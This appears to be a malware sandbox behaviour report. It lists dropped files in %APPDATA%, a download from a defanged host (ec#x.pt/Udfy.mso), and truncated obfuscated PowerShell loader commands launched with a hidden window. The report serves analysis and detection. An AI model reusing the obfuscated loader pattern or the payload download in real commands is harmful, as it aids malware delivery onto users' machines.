Technical Information
- %APPDATA%\bit4836.tmp
- %APPDATA%\bit4836.tmp
- from %APPDATA%\bit4836.tmp to %APPDATA%\metavana.bev
- 'ec#x.pt':80
- http://ec#x.pt/Udfy.mso
- DNS ASK ec#x.pt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Segmen179 ([String]$Dlrselvsta156){$Polyphagi = 5;For($Resta=4; $Resta -lt $Dlrselvsta156.Length-1; $Resta+=$Polyphagi){ $Dualis4 = $Dlrselvsta156.Substring($Resta, $Axiteresu); $Dual...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Segmen179 ([String]$Dlrselvsta156){$Polyphagi = 5;For($Resta=4; $Resta -lt $Dlrselvsta156.Length-1; $Resta+=$Polyphagi){ $Dualis4 = $Dlrselvsta156.Substring($Resta, $Axiteresu); $Dual...
- '<SYSTEM32>\cmd.exe' /c "echo 1 && exit"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Segmen179 ([String]$Dlrselvsta156){$Polyphagi = 5;For($Resta=4; $Resta -lt $Dlrselvsta156.Length-1; $Resta+=$Polyphagi){ $Dualis4 = $Dlrselvsta156.Substring($Resta, $Axiteresu); $Dual...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 1 && exit"